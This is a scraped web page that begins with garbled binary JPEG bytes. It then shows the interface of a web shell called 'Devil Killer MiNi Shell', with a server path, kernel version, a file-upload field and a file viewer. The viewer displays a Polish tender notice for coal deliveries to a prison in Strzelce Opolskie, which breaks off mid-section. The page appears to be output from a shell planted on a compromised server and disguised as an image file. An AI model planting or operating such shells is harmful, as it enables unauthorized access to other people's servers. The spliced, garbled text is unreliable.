JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211013/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211013/0023097701-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Sukcesywne dostawy węgla sortymentu ekogroszek do Zakładu Karnego nr 2 w Strzelcach Opolskich </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zakład Karny nr 2 w Strzelcach Opolskich</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000320940</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Klonowa 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Strzelce Opolskie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">47-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">77 462 11 55</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">77 461 35 41</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zk_2_strzelce_opolskie@sw.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.sw.gov.pl/jednostka/zaklad-karny-nr-2-w-strzelcach-opolskich</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Zakład Karny </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sukcesywne dostawy węgla sortymentu ekogroszek do Zakładu Karnego nr 2 w Strzelcach Opolskich </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9ebf6f00-2c04-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00230977</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00019459/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Dostawy węgla (ekogroszku)</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://zp.swnet.sw.gov.pl/_layouts/15/ZamowieniaPubliczne/ZP_Start.aspx/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej: miniPortalu – narzędzia przygotowanego przez Urząd Zamówień Publicznych, dostępnego pod adresem ,https://miniportal.uzp.gov.pl ePUAPu https://epuap.gov.pl/wps/portal oraz poczty elektronicznej: zk_2_strzelce_opolskie@sw.gov.pl lub rafal.kucma@sw.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) W<br/>postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa<br/>się przy użyciu środków komunikacji elektronicznej: miniPortalu – narzędzia przygotowanego przez<br/>Urząd Zamówień Publicznych, dostępnego pod adresem https://miniportal.uzp.gov.pl, ePUAPu<br/>https://epuap.gov.pl/wps/portal oraz poczty elektronicznej: zk_2_strzelce_opolskie@sw.gov lub<br/>rafal.kucma@sw.gov.pl<br/>2) Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących<br/>formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku” oraz do „Formularza do<br/>komunikacji”,<br/>3) Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w regulaminie korzystania z systemu miniPortal oraz warunkach korzystania z<br/>elektronicznej platformy usług administracji publicznej (ePUAP),<br/>4) Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz<br/>złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB,<br/>Ogłoszenie nr 2021/BZP 00179402/01 z dnia 2021-09-14<br/>2021-09-14 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>5) Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich<br/>przekazania na ePUAP;<br/>6) Zamawiający przekazuje na stronie prowadzonego postępowania tj. www.zp.sw.gov.pl - ID<br/>postępowania. Dane postępowanie można wyszukać również na liście wszystkich postępowań w<br/>miniPortalu klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki<br/>Postępowania.<br/>2. Sposób komunikowania się Zamawiającego z Wykonawcami (nie dotyczy składania ofert).<br/>1) W postępowaniu o udzielenie zamówienia komunikacja pomiędzy Zamawiającym a Wykonawcami w<br/>szczególności składanie oświadczeń, zawiadomień oraz przekazywanie informacji odbywa się<br/>elektronicznie za pośrednictwem dedykowanego formularza: „Formularz do komunikacji” dostępnego<br/>na ePUAP.<br/>We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy<br/>posługują się numerem ogłoszenia (BZP, TED lub ID postępowania);<br/>2) Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej,<br/>email: zk_2_strzelce_opolskie@sw.gov lub rafal.kucma@sw.gov.pl<br/>3) Dokumenty elektroniczne, składane są przez Wykonawcę za pośrednictwem „Formularza do<br/>komunikacji” jako załączniki. Zamawiający dopuszcza również możliwość składania dokumentów<br/>elektronicznych za pomocą poczty elektronicznej, na email: zk_2_strzelce_opolskie@sw.gov lub<br/>rafal.kucma@sw.gov.pl. Sposób sporządzenia dokumentów elektronicznych musi być zgody z<br/>wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w<br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz. U. z 2020 poz. 2452) oraz rozporządzeniu Ministra<br/>Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych<br/>oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z<br/>2020 poz. 2415).<br/>4) Zamawiający nie przewiduje komunikowania się z wykonawcami w inny sposób niż przy użyciu<br/>środków komunikacji elektronicznej.<br/>5) Osoby wskazane do porozumiewania się z wykonawcami w zakresie SWZ:+<br/>Rafał Kućma tel. 77/462 44 69 , e- mail: rafal.kucma@sw.gov.pl<br/>w zakresie przedmiotu zamówienia:<br/>Marcin Fido tel. 77/462 44 64, e-mail: marcin.fido@sw.gov.pl<br/>od poniedziałku do piątku w godzinach 07:30 – 15:30</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1) administratorem Pani/Pana danych osobowych jest Dyrektor Zakładu Karnego nr 2 w Strzelcach Opolskich, ul. Klonowa 3, 47-100 Strzelce Opolskie,<br/>2) inspektorem ochrony danych osobowych w Zakładzie Karnym Nr 2 w Strzelcach Opolskich jest mjr Krzysztof Szczygieł,<br/>tel. 77 462 44 76, email: Krzysztof.Szczygiel@sw.gov.pl<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego na „Sukcesywne dostawy węgla sortymentu ekogroszek do Zakładu Karnego nr 2 w Strzelcach Opolskich” - DKw.2232.10.2021.RK prowadzonym w trybie podstawowym, na podstawie art. 275 pkt. 1 ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019 z późn. zm.) zwanej dalej także „ Pzp''.;<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. Pzp;<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DKw.2232.10.2021.RK</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest dostawa „węgla sortymentu ekogroszek” w ilości 570 ton. <br/><br/>Podana ilość przedmiotu zamówienia jest ilością maksymalną w ciągu trwania umowy. Ostateczna ilość dostarczanego węgla może ulec zmniejszeniu, będzie ona wynikała z faktycznych potrzeb Zamawiającego, przy czym będzie to wielkość nie mniejsza niż 80 % wielkości całego zamówienia. W związku z zmniejszeniem danej ilości Zamawiający nie poniesie żadnych skutków prawnych. <br/><br/>2. Parametry jakie musi spełniać przedmiot zamówienia: <br/><br/>Węgiel sortymentu ekogroszek musi charakteryzować się następującymi właściwościami: <br/><br/>-wartość opałowa (Qri) powyżej 26MJ/kg<br/>-granulacja (uziarnienie): 5 -25 mm<br/>-zdolność spiekania wg. metody Rogi, RI poniżej 10<br/>-zawartość popiołu (części niepalnych)(Ar) - 4% ÷ 10%<br/>-zawartość siarki(Srt)poniżej 0,6%<br/>-wilgotność poniżej 15%<br/>-temperatura topnienia popiołu powyżej 1150°C<br/>-zawartość miału do 10%<br/>-niskie pęcznienie (węgiel nie zlepia się w czasie palenia) 3 <br/><br/>3. Przybliżone wielkości dostaw w okresach miesięcznych: <br/><br/>Węgiel sortymentu ekogroszek <br/><br/>listopad 2021 r. – 60 ton, <br/>grudzień 2021 r. – 80 ton,<br/>styczeń 2022 r. – 80 ton,<br/>luty 2022 r. – 70 ton,<br/>marzec 2022 r. – 50 ton,<br/>kwiecień 2022 r. – 30 ton,<br/>maj 2022 r. – 30 ton<br/>czerwiec 2022 r. – 30 tom<br/>lipiec 2022 r. – 30 ton<br/>sierpień 2022 r. - 30 ton, <br/>wrzesień 2022 r. - 30 ton, <br/>październik 2022 r. - 50 ton.<br/><br/>4. Zasady i warunki realizacji zamówienia publicznego, warunki płatności oraz warunki dostawy:<br/><br/>- zamawiający będzie przekazywać wykonawcy zamówienie określające wielkość kolejnej dostawy minimum 5 dni przed planowanym terminem dostawy telefonicznie lub faksem w którym zostanie określony termin oraz wielkość dostawy. <br/>- w dniu dostawy wykonawca zobowiązany będzie dla każdej dostawy dołączyć certyfikat jakości węgla wystawiony przez uprawniony podmiot, lub jego kopię potwierdzoną za zgodność z oryginałem przez Wykonawcę, w którym będą zawarte informacje dotyczące m.in.: sortymentu, wartości opałowej, zawartości popiołu, zawartości siarki oraz wilgotności. <br/>- wykonawca dostarczał będzie węgiel sortymentu ekogroszek samochodami samowyładowczymi posiadającymi zabezpieczenie przewożonego węgla przed wpływem warunków atmosferycznych, w sposób zapobiegający utracie jego walorów użytkowych do siedziby Zamawiającego na plac opałowy znajdujący się w Zakładzie Karnym Nr 2 w Strzelcach Opolskich ul. Klonowa 3, 47- 100 Strzelce Opolskie woj. opolskie. <br/>- wielkość maksymalna jednorazowej dostawy wynosi 100 ton <br/>- wielkość minimalna jednorazowej dostawy wynosi 20 ton <br/>- dostawy węgla będą realizowane od poniedziałku do piątku w dni robocze, od godziny 8ºº do godziny 13ºº<br/>- parametry bramy wjazdowej: szerokość 3,60m, wysokość 4,30m <br/>- odbiór zamawianego węgla przeprowadzany będzie każdorazowo w obecności przedstawiciela Zamawiającego oraz przedstawiciela Wykonawcy i polegać będzie na komisyjnym przeważeniu pojazdu (waga brutto i tara) na legalizowanych wagach. Koszt dojazdu do miejsca ważenia pokrywa Wykonawca, koszt ważenia pokrywa Zamawiający. <br/>- miejsce ważenia 47-100 Strzelce Opolskie ul. Strzelców Bytomskich 88, woj. opolskie, odległość od siedziby Zamawiającego do miejsca ważenia wynosi ok 3 km. <br/>- dopuszcza się przeprowadzenie bezpłatnego ważenia na legalizowanej wadze Wykonawcy, pod warunkiem, że odległość od miejsca ważenia do siedziby Zamawiającego nie jest większa niż 15 kilometrów. <br/>- za prawidłowo zrealizowaną zostanie uznana dostawa, której różnica pomiędzy ilością węgla zamówionego, a dostarczoną wyniesie nie więcej niż +/- 10% ilości węgla zamówionego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09111210-5 - Węgiel kamienny</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2021-11-01 do 2022-10-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający oceni i porówna jedynie te oferty, które zostaną złożone przez wykonawców nie wykluczonych przez zamawiającego z niniejszego postępowania i nie zostaną odrzucone przez zamawiającego.<br/>2. Oferty zostaną ocenione przez zamawiającego w oparciu o następujące kryteria i ich znaczenie:<br/>Lp.<br/>KRYTERIUM<br/>ZNACZENIE PROCENTOWE KRYTERIUM ( WAGA)<br/>1<br/>CENA BRUTTO ZA CAŁOŚĆ ZAMÓWIENIA W DANEJ CZĘŚCI<br/>60,00%<br/>2<br/>TERMIN PŁATNOŚCI<br/>40,00%<br/><br/>Nazwa kryterium „cena brutto za całość zamówienia w danej części” – waga kryterium – 60 punktów ( punkty podane będą w pełnych cyfrach zgodnie z regułą matematyczną)<br/><br/> cena najniższa oferowana brutto<br/> Ilość punktów = ----------------------------------------- x 60 punktów<br/> cena badanej oferty brutto <br/>Wykonawca, który przedstawi najniższą cenę otrzyma 60 punktów, pozostali wykonawcy otrzymują odpowiednio mniej punktów, stosownie do wzoru.<br/>Nazwa kryterium „termin płatności” – waga kryterium – 40 punktów<br/>Termin płatności zostanie wyliczony na podstawie następującego zestawienia:<br/>1. do 14 dni - 0 punktów<br/>2. od 15 dni – do 20 dni - 15 punktów<br/>3. od 21 dni do 29 dni - 25 punktów<br/>4. 30 dni –40 punktów<br/>Maksymalną ilość punktów w kryterium „termin płatności” uzyska oferta, w której zaoferowany przez wykonawcę w formularzu ofertowym (zał. nr 4 do SWZ) termin płatności będzie wynosił 30 dni.<br/>WYNIK. Ocena ofert nastąpi przez ich uszeregowanie – od oferty z najwyższą liczbą punktów do oferty z najniższą liczbą punktów. Oferta z najwyższą liczbą punktów stanowi ofertę najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> zdolności technicznej lub zawodowej- zamawiający uzna, że wykonawca spełnia warunek w<br/>zakresie posiadania odpowiedniej zdolności technicznej lub zawodowej niezbędnej do realizacji<br/>zamówienia jeżeli:<br/>Wykonawca spełni warunek w przypadku gdy w ciągu ostatnich trzech lat przed upływem<br/>terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie,<br/>wykonał lub, w przypadku świadczeń okresowych lub ciągłych, wykonuje należycie co najmniej 2<br/>zamówienia polegające na dostawie węgla (ekogroszku) o łącznej wartości PLN brutto: 400<br/>000,00 PLN<br/>i na żądanie zamawiającego przedstawi wykaz tych dostaw wraz z referencjami.<br/>5.5.) Zamawiający <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz podmiotowych środków dowodowych<br/>Zgodnie z art. 274 ust. 1 ustawy Pzp, zamawiający przed wyborem najkorzystniejszej oferty wezwie<br/>wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie<br/>krótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych<br/>na potwierdzenie:<br/>Spełnienia warunków udziału w postępowaniu:<br/>- wykazu dostaw (zał. nr 6 do SWZ) - wykonanych w okresie ostatnich 3 lat przed upływem terminu<br/>składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem<br/>ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których dostawy te zostały<br/>wykonane, z załączeniem dowodów określających czy te dostawy zostały wykonane należycie, przy<br/>czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na<br/>rzecz którego dostawy były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze<br/>wykonawca nie jest w stanie uzyskać tych dokumentów – inne dokumenty;<br/>Wykonawca musi wykazać, że należycie wykonał co najmniej dwa zamówienia polegające na dostawie<br/>węgla (ekogroszku) o łącznej wartości 400 000,00 PLN brutto.<br/>Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać za<br/>pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w<br/>rozumieniu ustawy z 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania<br/>publiczne, o ile wykonawca wskazał w oświadczeniu wstępnym dane umożliwiające dostęp do tych<br/>środków.<br/>Wykonawca składa podmiotowe środki dowodowe aktualne na dzień ich złożenia.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) 